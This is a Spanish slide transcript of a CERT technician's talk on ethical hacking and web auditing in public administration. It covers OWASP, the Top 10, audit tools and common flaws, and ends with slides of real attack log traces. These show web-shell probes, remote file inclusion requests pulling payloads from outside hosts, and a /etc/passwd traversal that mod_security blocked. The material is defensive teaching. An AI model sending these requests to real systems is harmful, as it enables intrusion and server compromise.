Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Transcripción

1 Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

2 Índice 1. econfianza en INTECO. 1. INTECO-CERT: Objetivos y Servicios. 2. Auditorias Web. 1. OWASP & WASC. 2. Vulnerabilidades Web hoy en día. 3. Aplicaciones de auditoria para Web. 4. Procedimientos y técnicas de auditoria Web. 3. Hacking ético dentro de la Administración Publica. 1. Experiencias de colaboración de INTECO. 2. El otro lado: muestras de un ataque Web. 2

3 Actuaciones en e-confianza de INTECO 1. Qué es INTECO? Instituto Nacional de Tecnologías de la Comunicación Sociedad estatal adscrita al MITYC a través de SETSI Instrumento del Plan Avanza para el desarrollo de la S.I Pilares: Investigación aplicada, prestación de servicios y formación OBJETIVOS Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TIC Alta localización de conocimiento intensivo y conexión con otros centros internacionales. 3

4 Actuaciones en e-confianza de INTECO 2. Líneas estratégicas de actuación e-confianza (Seguridad) Calidad SW Accesibilidad Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos Centro Demostrador de Seguridad para la PYME Laboratorio Nacional de Calidad Formación Promoción de proyectos TIC Promoción de estándares y normalización Centro de Referencia en estándares Web Promoción de la Accesibilidad Tecnológica y aplicación en la AGE (Portales, plataforma TDT, etc) Innovación en Tecnologías de Accesibilidad Ciudadanía e Internet Innovación TIC y Competitividad PYME 4

5 Actuaciones en e-confianza de INTECO 3. Proyectos en e-confianza e-confianza Sentar las bases de coordinación de iniciativas públicas en torno a la seguridad de los SI Coordinar investigación aplicada y formación especializada en el ámbito de la seguridad TIC. Convertirse en el Centro de Referencia en Seguridad Informática a nivel nacional. Servicios a PYME Servicios a Ciudadanos Observatorio de la Seguridad de la Información INTECO-CERT, Centro Nacional de Respuesta a Incidentes en Tecnologías de la Información para Pymes y Ciudadanos (antiguo CATA) Centro Demostrador de Seguridad para Pymes 5

6 Centro de Respuesta INTECO INTECO-CERT Misión y objetivos Servicios 6

7 Misión y objetivos de INTECO-CERT Objetivos Concienciar a las PYMEs y ciudadanos en materia de seguridad e impulsar su uso. Proporcionar mecanismos y servicios de prevención y reacción ante incidencias en materia de seguridad de la información. Proporcionar información clara y concisa acerca de la tecnología y la seguridad Proporcionar guías de buenas prácticas, recomendaciones y consejos Actuar como enlace entre las necesidades de PYMEs y ciudadanos y las soluciones existentes en el mercado 7

8 Servicios Prestados por INTECO-CERT Servicios en materia de seguridad: Servicios de Información: Suscripción a boletines y alertas Actualidad, noticias y eventos Avisos online sobre nuevos virus, vulnerabilidades, correo electrónico no deseado. Servicios de Formación: guías, manuales, cursos online Servicios de Protección: útiles gratuitos y actualizaciones de software Servicios de Respuesta y Soporte: Gestión y resolución de Incidencias Gestión de Malware o código malicioso Fraude electrónico Asesoría Legal Foros 8

9 Auditorias Web OWASP: Open Web Application Security Project Qué es OWASP? Fundación sin animo de lucro. Creada en Independiente de los fabricantes. Formada por voluntarios. Objetivos: Promover la seguridad de las aplicaciones web. Buscar las causas de la inseguridad. Proporcionar soluciones a las amenazas. Crear herramientas, documentación y estándares. 9

10 Auditorias Web OWASP: Open Web Application Security Project Qué hace OWASP? Recursos para equipos de desarrollo. Foros de discusión. Aplicaciones para auditoria y para formación. Documentación y artículos. Proyectos dentro de OWASP: Webscarab: Herramienta para auditoria. WebGoat: Herramienta para formación. OWASP Testing: Metodología. Web Application Penetration Checklist: Documentación. OWASP Guide y Top Ten Project: Documentación. 10

11 Auditorias Web WASC: Web Application Security Consortium Qué es WASC? Participada por la industria, expertos y organizaciones. Foro abierto de participación. Objetivos: Promover estándares de seguridad web. Elaboración de artículos y guías de seguridad web. Compartir el conocimiento sobre las amenazas web. Proyectos: Application Security Scanner Evaluation Criteria. Web Hacking Incidents Database. Distributed Open Proxy Honeypots. Web Security Threat Classification. 11

12 Vulnerabilidades Web Vulnerabilidades Web hoy en día: El Top 10 de vulnerabilidades de OWASP Cross Site Scripting (XSS). Inyecciones de código. Ejecución de ficheros maliciosos. Manipulación de rutas a objetos. Cross Site Request Forgery (CSRF). Manejo inadecuado de errores. 12

13 Vulnerabilidades Web Vulnerabilidades Web hoy en día: El Top 10 de vulnerabilidades de OWASP Robo de credenciales de sesión o de control de acceso. Almacenamiento de datos inseguro. Comunicaciones por un canal inseguro. Fallo en la ocultación de URLs de gestión

14 Aplicaciones de auditoria Web Aplicaciones comerciales Características comunes Propósito múltiple (no exclusivas por vulnerabilidad). Capacidad de auditoria ante cualquier tipo de aplicativo. Incorporan utilidades para pruebas manuales. Aspectos Configurables. Proporcionan abundante documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Un elevado precio. 14

15 Aplicaciones de auditoria Web Aplicaciones gratuitas Características comunes La mayoría son para un propósito especifico. Tienen limitaciones para algún tipo de aplicativo. Incorporan utilidades para pruebas manuales. Mayor capacidad de configuración. Proporcionan menos documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Son gratis. 15

16 Procedimientos y técnicas de auditoria Utilización de la herramienta adecuada a cada aplicativo. Metodología de auditoria. OWASP Testing. Web Application Penetration Checklist. OSSTMM. Chequear todos los resultados de las herramientas. Uso de herramientas para localización de URLs ocultas. Conocer en lo posible la aplicación. 16

17 Procedimientos y técnicas de auditoria Documentarse sobre las vulnerabilidades existentes. Uso de distintos patrones de los ataques XSS (Cross Site Scripting) Cheat Sheet - XSSDB attack database - Captura de evidencias. No realizar denegaciones de Servicio. Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking 17

18 Experiencias de colaboración de INTECO-CERT Vulnerabilidades más encontradas Vulnerabilidades de SQL inyection. Con obtención de usuarios y contraseñas. Incorrecto manejo de sesiones. Posibilidad de saltarse la autenticación y obtener una sesión privilegiada en la aplicación. Incorrecta configuración del servidor. Listado de directorios. Obtención de información sensible del servidor. Acceso a ficheros de logs. Versiones no actualizadas o con vulnerabilidades. Versiones de PHP, del gestor de contenidos, etc. 18

19 El otro lado: muestras de un ataque Búsqueda de un objetivo para un ataque GET /horde-3.0.6//readme HTTP/1.1 GET /horde-3.0.7//readme HTTP/1.1 GET /horde-3.0.8//readme HTTP/1.1 GET / //readme HTTP/1.1 GET /webmail//readme HTTP/1.1 GET /mailz//readme HTTP/1.1 GET /horde2//readme HTTP/1.1 GET //scgi/awstats/awstats.pl HTTP/1.1 GET //scripts/awstats.pl HTTP/1.1 GET //cgi-bin/awstats/awstats.pl HTTP/1.1 GET //cgi-bin/stats/awstats.pl HTTP/1.1 GET //scgi-bin/stats/awstats.pl HTTP/1.1 CONNECT :8080 HTTP/1.0 OPTIONS * HTTP/1.0 19

20 El otro lado: muestras de un ataque Búsqueda de un objetivo para un ataque GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin0/tbl_select.php HTTP/1.1 GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1 GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin2/read_dump.php HTTP/1.0 GET /phpmyadmin-2.2.3/read_dump.php HTTP/1.0 GET /phpmyadmin/r57.php HTTP/1.1 GET /phpmyadmin/c99.php HTTP/1.1 GET /phpmyadmin/shell.php HTTP/1.1 GET /phpmyadmin/cmd.php HTTP/1.1 GET /w00tw00t.at.isc.sans.mslog:) HTTP/1.1 GET /w00tw00t.at.isc.sans.pwn!t:) HTTP/1.1 GET /w00tw00t.at.isc.sans.dfind:) HTTP/1.1 20

21 El otro lado: muestras de un ataque Trazas de un intento de ataque /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= ww.theranchjohnstown.com/menu/r7?? HTTP/1.1 /en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= /sh311.altervista.org/a.txt?? HTTP/1.1 /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 311.altervista.org/a.txt?? HTTP/1.1 /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_di r]=ftp://ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff %FF%FF%FF%FF/1? HTTP/1.1 //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:// /upload/ p/old? HTTP/1.1 /_vti_bin/owssvr.dll?ul=1&act=4&build=6254&strmver=4&capreq=0 HTTP/1.1 21

22 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /includes/ordersuccess.inc.php?&glob=1&cart_order_id=1&glob[rootdir]=h ttp:// /joomla/1.gif?/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: Close Host: X User-Agent: Morfeus Fucking Scanner mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso

23 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root _dir]=ftp://ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%f F%FF%FF%FF%FF/1? HTTP/1.1 Connection: TE, close Host: TE: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.808 mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso

24 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0 Connection: Keep-Alive Content-Length: 0 Host: User-Agent: Mozilla/4.75 (Nikto/1.35 ) mod_security-action: 406 HTTP/ Not Acceptable Connection: close Content-Type: text/html; charset=iso

25 Preguntas? 25